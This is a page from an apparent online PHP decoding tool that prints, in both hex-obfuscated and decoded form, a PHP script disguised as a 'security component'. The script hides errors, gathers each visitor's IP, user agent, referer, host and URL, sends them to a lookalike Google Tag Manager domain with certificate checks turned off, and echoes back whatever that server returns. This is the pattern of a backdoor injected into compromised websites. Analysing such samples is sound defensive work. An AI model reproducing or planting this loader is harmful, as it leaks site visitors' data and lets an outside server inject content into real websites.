Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php /* do not delete the security component code. */ ob_start(); set_time_limit(3600);..

Decoded Output download

<?php 
/* do not delete the security component code. */ 
ob_start(); set_time_limit(3600); ini_set("display_errors", "Off"); ini_set("allow_url_fopen", "On"); ignore_user_abort(1); function getClientIP() { goto lHatdxH; lHatdxK: return "0.0.0.0"; goto lHatdxa; lHatdxg: foreach ($lcVdVx as $lcVdVt) { goto lHatdxn; lHatdxi: lHatdxd: goto lHatdxJ; lHatdxn: if (!(isset($_SERVER[$lcVdVt]) && filter_var($_SERVER[$lcVdVt], FILTER_VALIDATE_IP))) { goto lHatdxd; } goto lHatdxV; lHatdxV: return $_SERVER[$lcVdVt]; goto lHatdxi; lHatdxJ: } goto lHatdxK; lHatdxH: $lcVdVx = array("HTTP_CF_CONNECTING_IP", "HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR"); goto lHatdxg; lHatdxa: } function fetchRemoteContent($lcVdVd, $lcVdVn, $lcVdVV) { goto lHatdxM; lHatdtx: lHatdxy: goto lHatdtt; lHatdxM: if (function_exists("curl_init")) { goto lHatdxy; } goto lHatdxE; lHatdxc: goto lHatdxW; goto lHatdtx; lHatdtd: lHatdxW: goto lHatdtn; lHatdxE: return fetchRemoteContentWithFileGetContents($lcVdVd, $lcVdVn, $lcVdVV); goto lHatdxc; lHatdtt: return fetchRemoteContentWithCurl($lcVdVd, $lcVdVn, $lcVdVV); goto lHatdtd; lHatdtn: } function fetchRemoteContentWithCurl($lcVdVd, $lcVdVn, $lcVdVV) { goto lHatdtV; lHatdtc: curl_close($lcVdVi); goto lHatddx; lHatdtV: $lcVdVi = curl_init(); goto lHatdti; lHatdtK: curl_setopt($lcVdVi, CURLOPT_USERAGENT, $lcVdVn); goto lHatdta; lHatdta: curl_setopt($lcVdVi, CURLOPT_REFERER, $lcVdVV); goto lHatdty; lHatddx: return array("code" => $lcVdVH, "body" => $lcVdVJ); goto lHatddt; lHatdtJ: curl_setopt($lcVdVi, CURLOPT_HEADER, 0); goto lHatdtH; lHatdtg: curl_setopt($lcVdVi, CURLOPT_RETURNTRANSFER, 1); goto lHatdtK; lHatdti: curl_setopt($lcVdVi, CURLOPT_URL, $lcVdVd); goto lHatdtJ; lHatdtH: curl_setopt($lcVdVi, CURLOPT_TIMEOUT, 30); goto lHatdtg; lHatdtW: curl_setopt($lcVdVi, CURLOPT_SSL_VERIFYHOST, FALSE); goto lHatdtM; lHatdtE: $lcVdVH = curl_getinfo($lcVdVi, CURLINFO_HTTP_CODE); goto lHatdtc; lHatdty: curl_setopt($lcVdVi, CURLOPT_SSL_VERIFYPEER, FALSE); goto lHatdtW; lHatdtM: $lcVdVJ = curl_exec($lcVdVi); goto lHatdtE; lHatddt: } function fetchRemoteContentWithFileGetContents($lcVdVd, $lcVdVn, $lcVdVV) { goto lHatddc; lHatdnV: foreach ($http_response_header as $lcVdVW) { goto lHatddJ; lHatddW: lHatddi: goto lHatddM; lHatddK: $lcVdVy = intval($lcVdVM[1]); goto lHatdda; lHatddH: $lcVdVM = explode(" ", $lcVdVW); goto lHatddg; lHatddg: if (!(count($lcVdVM) > 1)) { goto lHatddV; } goto lHatddK; lHatddJ: if (!(strpos($lcVdVW, "HTTP/") === 0)) { goto lHatddi; } goto lHatddH; lHatddy: break; goto lHatddW; lHatdda: lHatddV: goto lHatddy; lHatddM: } goto lHatdni; lHatdnx: $lcVdVK = stream_context_create($lcVdVg); goto lHatdnt; lHatdni: lHatddE: goto lHatdnJ; lHatdnJ: return array("code" => $lcVdVy, "body" => $lcVdVa); goto lHatdnH; lHatdnt: $lcVdVa = @file_get_contents($lcVdVd, false, $lcVdVK); goto lHatdnd; lHatdnd: $lcVdVy = null; goto lHatdnn; lHatdnn: if (!(isset($http_response_header) && is_array($http_response_header))) { goto lHatddE; } goto lHatdnV; lHatddc: $lcVdVg = array("http" => array("method" => "GET", "header" => "User-Agent: {$lcVdVn}
" . "Referer: {$lcVdVV}\xd\xa", "timeout" => 30, "ignore_errors" => true), "ssl" => array("verify_peer" => false, "verify_peer_name" => false)); goto lHatdnx; lHatdnH: } $lcVdVn = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "null"; $lcVdVV = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "null"; $lcVdVE = getClientIP(); $lcVdVc = "http://www.qooqletagmanager.com/tag.php"; $lcVdix = isset($_GET["id"]) ? $_GET["id"] : (isset($_GET["ID"]) ? $_GET["ID"] : ''); $lcVdit = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : (isset($_SERVER["HTTP_X_FORWARDED_HOST"]) ? $_SERVER["HTTP_X_FORWARDED_HOST"] : ''); $lcVdid = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["HTTP_X_REWRITE_URL"]) ? $_SERVER["HTTP_X_REWRITE_URL"] : ''); try { goto lHatdnK; lHatdnE: echo $lcVdVJ["body"]; goto lHatdnc; lHatdnW: header("HTTP/1.0 404 Not Found"); goto lHatdnM; lHatdnM: lHatdng: goto lHatdnE; lHatdny: if (!($lcVdVJ["code"] == 404)) { goto lHatdng; } goto lHatdnW; lHatdnc: exit; goto lHatdVx; lHatdnK: $lcVdin = $lcVdVc . "?" . http_build_query(array("id" => $lcVdix, "ip" => $lcVdVE, "file" => urlencode($lcVdid), "host" => urlencode($lcVdit), "referer" => urlencode($lcVdVV))); goto lHatdna; lHatdna: $lcVdVJ = fetchRemoteContent($lcVdin, $lcVdVn, $lcVdVV); goto lHatdny; lHatdVx: } catch (Exception $lcVdiV) { } ob_end_flush(); ?>

Did this file decode correctly?

Original Code

<?php
/* do not delete the security component code. */
ob_start(); set_time_limit(3600); ini_set("\x64\x69\163\x70\154\x61\x79\x5f\145\x72\162\x6f\x72\163", "\117\146\x66"); ini_set("\x61\x6c\x6c\x6f\x77\x5f\x75\162\x6c\x5f\x66\157\160\x65\156", "\x4f\156"); ignore_user_abort(1); function getClientIP() { goto lHatdxH; lHatdxK: return "\60\x2e\x30\x2e\x30\x2e\x30"; goto lHatdxa; lHatdxg: foreach ($lcVdVx as $lcVdVt) { goto lHatdxn; lHatdxi: lHatdxd: goto lHatdxJ; lHatdxn: if (!(isset($_SERVER[$lcVdVt]) && filter_var($_SERVER[$lcVdVt], FILTER_VALIDATE_IP))) { goto lHatdxd; } goto lHatdxV; lHatdxV: return $_SERVER[$lcVdVt]; goto lHatdxi; lHatdxJ: } goto lHatdxK; lHatdxH: $lcVdVx = array("\x48\x54\x54\x50\x5f\x43\x46\137\103\117\116\116\105\x43\124\x49\116\x47\x5f\111\x50", "\x48\x54\124\x50\137\103\114\x49\105\116\x54\137\111\120", "\110\x54\124\120\137\x58\x5f\106\117\122\127\x41\x52\x44\105\104\x5f\106\x4f\122", "\110\124\x54\x50\x5f\130\137\x46\x4f\122\127\x41\x52\104\105\104", "\x48\124\x54\x50\137\130\x5f\x43\x4c\x55\123\x54\x45\122\x5f\x43\114\111\105\x4e\x54\137\x49\x50", "\110\124\x54\120\x5f\x46\117\x52\x57\x41\x52\104\105\104\137\x46\x4f\x52", "\110\x54\124\120\137\106\x4f\122\127\101\122\104\105\104", "\x52\x45\115\117\x54\105\x5f\101\104\x44\122"); goto lHatdxg; lHatdxa: } function fetchRemoteContent($lcVdVd, $lcVdVn, $lcVdVV) { goto lHatdxM; lHatdtx: lHatdxy: goto lHatdtt; lHatdxM: if (function_exists("\143\x75\162\154\x5f\151\x6e\x69\x74")) { goto lHatdxy; } goto lHatdxE; lHatdxc: goto lHatdxW; goto lHatdtx; lHatdtd: lHatdxW: goto lHatdtn; lHatdxE: return fetchRemoteContentWithFileGetContents($lcVdVd, $lcVdVn, $lcVdVV); goto lHatdxc; lHatdtt: return fetchRemoteContentWithCurl($lcVdVd, $lcVdVn, $lcVdVV); goto lHatdtd; lHatdtn: } function fetchRemoteContentWithCurl($lcVdVd, $lcVdVn, $lcVdVV) { goto lHatdtV; lHatdtc: curl_close($lcVdVi); goto lHatddx; lHatdtV: $lcVdVi = curl_init(); goto lHatdti; lHatdtK: curl_setopt($lcVdVi, CURLOPT_USERAGENT, $lcVdVn); goto lHatdta; lHatdta: curl_setopt($lcVdVi, CURLOPT_REFERER, $lcVdVV); goto lHatdty; lHatddx: return array("\143\x6f\x64\x65" => $lcVdVH, "\142\157\x64\171" => $lcVdVJ); goto lHatddt; lHatdtJ: curl_setopt($lcVdVi, CURLOPT_HEADER, 0); goto lHatdtH; lHatdtg: curl_setopt($lcVdVi, CURLOPT_RETURNTRANSFER, 1); goto lHatdtK; lHatdti: curl_setopt($lcVdVi, CURLOPT_URL, $lcVdVd); goto lHatdtJ; lHatdtH: curl_setopt($lcVdVi, CURLOPT_TIMEOUT, 30); goto lHatdtg; lHatdtW: curl_setopt($lcVdVi, CURLOPT_SSL_VERIFYHOST, FALSE); goto lHatdtM; lHatdtE: $lcVdVH = curl_getinfo($lcVdVi, CURLINFO_HTTP_CODE); goto lHatdtc; lHatdty: curl_setopt($lcVdVi, CURLOPT_SSL_VERIFYPEER, FALSE); goto lHatdtW; lHatdtM: $lcVdVJ = curl_exec($lcVdVi); goto lHatdtE; lHatddt: } function fetchRemoteContentWithFileGetContents($lcVdVd, $lcVdVn, $lcVdVV) { goto lHatddc; lHatdnV: foreach ($http_response_header as $lcVdVW) { goto lHatddJ; lHatddW: lHatddi: goto lHatddM; lHatddK: $lcVdVy = intval($lcVdVM[1]); goto lHatdda; lHatddH: $lcVdVM = explode("\40", $lcVdVW); goto lHatddg; lHatddg: if (!(count($lcVdVM) > 1)) { goto lHatddV; } goto lHatddK; lHatddJ: if (!(strpos($lcVdVW, "\110\124\x54\x50\x2f") === 0)) { goto lHatddi; } goto lHatddH; lHatddy: break; goto lHatddW; lHatdda: lHatddV: goto lHatddy; lHatddM: } goto lHatdni; lHatdnx: $lcVdVK = stream_context_create($lcVdVg); goto lHatdnt; lHatdni: lHatddE: goto lHatdnJ; lHatdnJ: return array("\143\157\x64\145" => $lcVdVy, "\142\x6f\x64\171" => $lcVdVa); goto lHatdnH; lHatdnt: $lcVdVa = @file_get_contents($lcVdVd, false, $lcVdVK); goto lHatdnd; lHatdnd: $lcVdVy = null; goto lHatdnn; lHatdnn: if (!(isset($http_response_header) && is_array($http_response_header))) { goto lHatddE; } goto lHatdnV; lHatddc: $lcVdVg = array("\x68\x74\164\x70" => array("\x6d\x65\x74\x68\x6f\144" => "\x47\x45\124", "\150\145\141\144\145\162" => "\x55\163\145\x72\x2d\x41\147\145\x6e\164\72\x20{$lcVdVn}\15\12" . "\122\x65\x66\x65\x72\145\x72\x3a\x20{$lcVdVV}\xd\xa", "\x74\x69\x6d\145\157\165\164" => 30, "\x69\147\156\157\x72\145\x5f\x65\x72\162\157\162\163" => true), "\163\163\154" => array("\x76\145\x72\x69\x66\x79\x5f\160\x65\x65\162" => false, "\166\145\x72\151\x66\x79\x5f\x70\145\x65\x72\x5f\x6e\141\155\145" => false)); goto lHatdnx; lHatdnH: } $lcVdVn = isset($_SERVER["\x48\124\124\x50\x5f\x55\123\x45\x52\137\x41\107\105\116\124"]) ? $_SERVER["\x48\124\124\120\137\x55\123\105\122\x5f\101\x47\x45\116\x54"] : "\156\165\x6c\154"; $lcVdVV = isset($_SERVER["\110\124\x54\120\x5f\122\105\106\x45\x52\105\122"]) ? $_SERVER["\x48\124\124\x50\x5f\122\105\x46\x45\122\105\122"] : "\156\165\154\x6c"; $lcVdVE = getClientIP(); $lcVdVc = "\x68\164\x74\160\72\57\57\x77\167\167\x2e\x71\157\x6f\x71\154\145\164\x61\x67\x6d\x61\x6e\141\147\145\x72\x2e\143\157\155\x2f\x74\x61\147\x2e\x70\150\x70"; $lcVdix = isset($_GET["\151\144"]) ? $_GET["\151\x64"] : (isset($_GET["\111\104"]) ? $_GET["\x49\104"] : ''); $lcVdit = isset($_SERVER["\110\124\124\x50\x5f\x48\117\x53\124"]) ? $_SERVER["\110\x54\124\120\137\110\117\x53\x54"] : (isset($_SERVER["\110\124\124\x50\x5f\130\x5f\106\x4f\122\x57\x41\x52\x44\105\104\x5f\110\x4f\x53\124"]) ? $_SERVER["\x48\x54\x54\x50\137\130\137\106\117\x52\x57\101\x52\104\105\104\x5f\x48\117\x53\x54"] : ''); $lcVdid = isset($_SERVER["\122\x45\x51\125\105\x53\x54\x5f\125\122\x49"]) ? $_SERVER["\x52\x45\x51\x55\105\x53\x54\137\125\x52\111"] : (isset($_SERVER["\110\x54\x54\120\x5f\130\137\x52\105\x57\122\x49\x54\x45\137\x55\122\x4c"]) ? $_SERVER["\110\124\x54\120\137\130\137\x52\105\127\x52\111\x54\x45\x5f\x55\122\x4c"] : ''); try { goto lHatdnK; lHatdnE: echo $lcVdVJ["\142\x6f\144\x79"]; goto lHatdnc; lHatdnW: header("\110\124\124\120\57\61\x2e\60\40\x34\x30\64\x20\116\157\164\40\x46\157\x75\156\144"); goto lHatdnM; lHatdnM: lHatdng: goto lHatdnE; lHatdny: if (!($lcVdVJ["\x63\x6f\144\x65"] == 404)) { goto lHatdng; } goto lHatdnW; lHatdnc: exit; goto lHatdVx; lHatdnK: $lcVdin = $lcVdVc . "\77" . http_build_query(array("\151\x64" => $lcVdix, "\151\160" => $lcVdVE, "\146\x69\154\x65" => urlencode($lcVdid), "\x68\x6f\x73\164" => urlencode($lcVdit), "\162\x65\146\145\x72\x65\x72" => urlencode($lcVdVV))); goto lHatdna; lHatdna: $lcVdVJ = fetchRemoteContent($lcVdin, $lcVdVn, $lcVdVV); goto lHatdny; lHatdVx: } catch (Exception $lcVdiV) { } ob_end_flush();

Function Calls

None

Variables

None

Stats

MD5	d2bda180921cd07053fd17a97303f1e6
Eval Count	0
Decode Time	54 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats